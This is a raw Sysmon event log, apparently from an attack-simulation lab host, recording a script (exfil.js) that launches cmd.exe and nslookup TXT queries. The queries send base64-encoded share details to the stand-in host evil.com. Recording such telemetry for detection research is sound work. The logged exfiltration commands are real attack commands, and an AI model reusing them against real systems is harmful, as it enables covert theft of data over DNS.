14:21:28.256{00000000-0000-0000-0000-000000000000}7432evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.135{00000000-0000-0000-0000-000000000000}2900evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.072{00000000-0000-0000-0000-000000000000}6932evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.996{00000000-0000-0000-0000-000000000000}7304evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000208297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.890{00000000-0000-0000-0000-000000000000}8152evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000208296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.811{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-6143-000000005F02}7912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.811{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-6143-000000005F02}7912C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.811{2E1864BB-18E9-629A-6143-000000005F02}79123796C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-6043-000000005F02}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.811{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-6143-000000005F02}7912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.796{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.796{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.796{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.796{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.796{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-6043-000000005F02}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.796{2E1864BB-18E0-629A-6742-000000005F02}39761636C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-6043-000000005F02}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.807{2E1864BB-18E9-629A-6043-000000005F02}3500C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyvpxq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.796{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlguki.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.774{2E1864BB-18E9-629A-5E43-000000005F02}22447176C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5F43-000000005F02}5968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.758{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5F43-000000005F02}5968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.758{2E1864BB-18E9-629A-5D43-000000005F02}77087524C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-5F43-000000005F02}5968C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.770{2E1864BB-18E9-629A-5F43-000000005F02}5968C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-5D43-000000005F02}7708C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlguki.tmp 2>&1 10341000x8000000000000000208276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.743{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5E43-000000005F02}2244C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.743{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5E43-000000005F02}2244C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.743{2E1864BB-18E9-629A-5E43-000000005F02}22447176C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5D43-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.727{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5E43-000000005F02}2244C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.727{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.727{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.727{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.727{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.712{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5D43-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.712{2E1864BB-18E0-629A-6742-000000005F02}3976304C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-5D43-000000005F02}7708C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.726{2E1864BB-18E9-629A-5D43-000000005F02}7708C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlguki.tmp 